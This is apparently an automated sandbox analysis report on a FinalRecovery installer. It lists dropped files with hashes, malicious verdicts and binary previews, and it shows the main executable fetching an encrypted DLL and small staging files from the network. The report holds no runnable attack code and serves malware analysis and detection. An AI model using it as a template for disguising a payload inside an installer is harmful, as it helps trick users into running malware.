              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 8.248.113.254, 8.238.190.126, 67.26.139.254, 8.248.139.254, 67.26.137.254, 93.184.221.240
              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              10:17:04API Interceptor1x Sleep call for process: wEQg8.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):791040
              Entropy (8bit):6.608982798504157
              Encrypted:false
              SSDEEP:24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
              MD5:5C2FE7D4DDE65810152054F3C93C1815
              SHA1:2A19F3FAA78A5072068F7902DB19A248F11FA69B
              SHA-256:233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
              SHA-512:2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:moderate, very likely benign file
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\Readme.txt (copy)

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1949
              Entropy (8bit):4.915453283427292
              Encrypted:false
              SSDEEP:48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
              MD5:C0AE85DB30FE9027DBBF3BA758FA78BE
              SHA1:95E69DB95504A9F61D090690F32FB5D2F685C604
              SHA-256:CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
              SHA-512:DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\Config.xml (copy)

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
              Category:dropped
              Size (bytes):6452
              Entropy (8bit):4.734154041089812
              Encrypted:false
              SSDEEP:96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
              MD5:247D3A0C3B0C53CA33D032A561619495
              SHA1:F30570C48749FE427FACCBDF925048B149D22460
              SHA-256:783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
              SHA-512:9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\is-CFA7P.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
              Category:dropped
              Size (bytes):6452
              Entropy (8bit):4.734154041089812
              Encrypted:false
              SSDEEP:96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
              MD5:247D3A0C3B0C53CA33D032A561619495
              SHA1:F30570C48749FE427FACCBDF925048B149D22460
              SHA-256:783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
              SHA-512:9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.chm (copy)

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:MS Windows HtmlHelp Data
              Category:dropped
              Size (bytes):553405
              Entropy (8bit):7.979175020825392
              Encrypted:false
              SSDEEP:12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
              MD5:37E6EEA8C4E469F6439F3790166815DD
              SHA1:E0A3768F291CC7FCE178A001F0356D4FBA29D81F
              SHA-256:606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
              SHA-512:68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
              Malicious:false
              Preview:ITSF....`.......&..u.......|.{.......".....|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Category:modified
              Size (bytes):1327101
              Entropy (8bit):6.5808664941884
              Encrypted:false
              SSDEEP:24576:ao3RaJaXyPGnMQO9hLCbg5bm/GAiiXWDwpz2n60uKACK7p33r3L++fNlol:toECPpvj6GAQwzKqG
              MD5:04947B1020E31A5F5A6E41FD279B4E74
              SHA1:815B42143F71CC7FFD1943E9E1971F9ABEA82BF0
              SHA-256:2F220AEDF9ADF351EDCC62CD2917E1590C8DA932D3BCCE276AC082B3DEBCFF8C
              SHA-512:CE8D691F9BF52ECFF8C26CAC3D3D444E2ADB01DAAF32138923B1E6E7D0CCE373F060A1F719808A35852FE70AB7AB8670F91C3B7775A9B3754323521FD4BEBD7C
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-13C1Q.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:data
              Category:dropped
              Size (bytes):1327101
              Entropy (8bit):6.58086621775031
              Encrypted:false
              SSDEEP:24576:fo3RaJaXyPGnMQO9hLCbg5bm/GAiiXWDwpz2n60uKACK7p33r3L++fNlol:6oECPpvj6GAQwzKqG
              MD5:05C8159B5028CE14F3DE0C2F38D01DED
              SHA1:0C0FAEE09CE3F28530A56955611422902D1F101C
              SHA-256:57B1E1B366C667078FE2E1203900E7E139A1AAB0704654D9906B5A1C4C15EB4C
              SHA-512:2680B3AE8B5986ACC9F9548094799F27EC120CE00C89CF2A624F73423630D397F7D7F20A3BCF013A0E45FF8A2B8A672E2414426B1DDAC8B94A3D8BCCC92CFDF0
              Malicious:false
              Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-6R8AD.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1949
              Entropy (8bit):4.915453283427292
              Encrypted:false
              SSDEEP:48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
              MD5:C0AE85DB30FE9027DBBF3BA758FA78BE
              SHA1:95E69DB95504A9F61D090690F32FB5D2F685C604
              SHA-256:CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
              SHA-512:DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
              Malicious:false
              Preview:.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-H9OSH.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):723230
              Entropy (8bit):6.49191904892708
              Encrypted:false
              SSDEEP:12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
              MD5:D0E4493CD1CEC1B97F24BAB12A942543
              SHA1:CEE352F43F982FCB36A337D2C15FFDD28B04B80D
              SHA-256:C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
              SHA-512:D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
              Malicious:true
              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-I8MHH.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:MS Windows HtmlHelp Data
              Category:dropped
              Size (bytes):553405
              Entropy (8bit):7.979175020825392
              Encrypted:false
              SSDEEP:12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
              MD5:37E6EEA8C4E469F6439F3790166815DD
              SHA1:E0A3768F291CC7FCE178A001F0356D4FBA29D81F
              SHA-256:606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
              SHA-512:68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
              Malicious:false
              Preview:ITSF....`.......&..u.......|.{.......".....|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):791040
              Entropy (8bit):6.608982798504157
              Encrypted:false
              SSDEEP:24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
              MD5:5C2FE7D4DDE65810152054F3C93C1815
              SHA1:2A19F3FAA78A5072068F7902DB19A248F11FA69B
              SHA-256:233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
              SHA-512:2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.dat

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:InnoSetup Log FgasoftFR FinalRecovery, version 0x30, 4340 bytes, 701188\user, "C:\Program Files (x86)\FgasoftFR\FinalRecovery"
              Category:dropped
              Size (bytes):4340
              Entropy (8bit):4.710584129714836
              Encrypted:false
              SSDEEP:96:WyWx5pJU+oIahqwOIhdc87ICSss/LBtbgfjf:WyWx5pJU+KEIhZICSsATgfr
              MD5:3B5506D7E7E0F3FF3FD02721245AB513
              SHA1:2F37FA895A32EA49673C61411FCB373ACDD91CD4
              SHA-256:699BD1692AA255B3291F6ECD60B5B7AB512CE10CB008B2CBD18F8B12A166D01C
              SHA-512:47EF21909EDB36900B14F100DCC9BBFECBF7B2482AFAFD232093D92C41FF440160B924D1B582B5FBC960A0F35EBA99C6479707E5F244B601F6D770CAECFA79EC
              Malicious:false
              Preview:Inno Setup Uninstall Log (b)....................................FgasoftFR FinalRecovery.........................................................................................................FgasoftFR FinalRecovery.........................................................................................................0...........%.................................................................................................................Wc(.......=.y0......N....701188.user.C:\Program Files (x86)\FgasoftFR\FinalRecovery.................. ..........b.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.d

              C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):723230
              Entropy (8bit):6.49191904892708
              Encrypted:false
              SSDEEP:12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
              MD5:D0E4493CD1CEC1B97F24BAB12A942543
              SHA1:CEE352F43F982FCB36A337D2C15FFDD28B04B80D
              SHA-256:C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
              SHA-512:D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
              Malicious:true
              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

              Download File
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:data
              Category:dropped
              Size (bytes):95248
              Entropy (8bit):7.998277474001343
              Encrypted:true
              SSDEEP:1536:1ajIVNDkCngyeaL3ZC7cjgn35QgjaeiPr6idOZAkOLfTRCaLQhAboaAkepTXnkY5:1vVpj3ZC72gnJQg2eikik4FC9/RX+f6
              MD5:636E3CA21F2541B5EE3AB9922A183C79
              SHA1:4B98C5432E534AF5FA17424C907E61CCFA6880D9
              SHA-256:9B97BF40465ACFBAB5D61EE45ECAC1E485A988ADC66E1A859F950605DC5677B9
              SHA-512:6AA99DFAB439063332383EBA737F34A5929353794245E8E4469EAEB2F7055889891D5A3F3CD3C9F20E37DCDEBFA78C5B5749F3BFDF40263970C880F047A0BDBB
              Malicious:false
              Preview:..'m..h.f{Q{..7_....l../....3`.p.$.....]....~@..Vt.%..eB.9a../_...G...|.O..0HG`......`... k..x#.).....W..n...;.vmN....T..:l...........37r.../..X.1,..)..^.Y....N.{8........=..R..E.z.c..G.~X.0.}.b....rE..d...........(...M`.O.Y....?....D...R....N...C.{..E.\i.......:.h...#..\...d...*O.."..N.yw.2.$..L.{....[w\....v.....zm....9.|.q...p....j.WfQ.5h^rY.r.-..^}g.......]%...El.98Q..5F).F...).KBD..<0..l7...:..!.....L..P.l..oV....h..~;.G..K....-..={.....U.%...~.(.DE..8..df./...n...FC....~#.`.a........B.r..OJ^-...$.(`...N..*k....P..h.....+.o...W.m.0...&j...E...Sip..p...U..Qx...q.[.."......U..n|.Me_...PT.|c.wt....5l...'..f..6n..,.+....4*....J.\..+..\..C...:1.u..l.h...n.6..5P.-/........m70D..D._....?..9.*V...M8..m.T.]4.i.IQN....BV..."h.......f......V.(..W..H.`,.V`..l.;...}.@.......*..rD....6OP.OC#^......=^7.R...tx..Q<..J..o.n..q.O..f.F....).Y2v..I...g.lnV.X..sm.>....^eO.l.....EB...u.m.E.|.X...)b 7.K.ma."..%t..p.....U\.....L..A.:._.@...c3..[.m...

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\stuk[1].htm

              Download File
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):21
              Entropy (8bit):3.975418017913833
              Encrypted:false
              SSDEEP:3:iIxcsJE:iyE
              MD5:C0236A8F8EB0411CC373CD432E252990
              SHA1:49CA519830FADD97FA7BFB7C3404ED2DB29DF4E0
              SHA-256:375CD2A305050C0ECDC8EF9A417194DB2955F3C99B04C76F1B2CD5A88369A242
              SHA-512:3EDFDF13D9AE53C3DC77B299137C7F318B689F4880D72E50CF037F5A4F5C2A6CBC24CB5FE557C10F458CD1658B65E27EF994794FAB2D8E1562694E7DE5039E7E
              Malicious:false
              Preview:kvQoRqtcCyMtHmQyQXOUu

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dll[1].htm

              Download File
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dll[1].htm

              Download File
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\plus[1].htm

              Download File
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0

              C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):4.026670007889822
              Encrypted:false
              SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
              MD5:0EE914C6F0BB93996C75941E1AD629C6
              SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
              SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
              SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_iscrypt.dll

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):2560
              Entropy (8bit):2.8818118453929262
              Encrypted:false
              SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
              MD5:A69559718AB506675E907FE49DEB71E9
              SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
              SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
              SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32+ executable (console) x86-64, for MS Windows
              Category:dropped
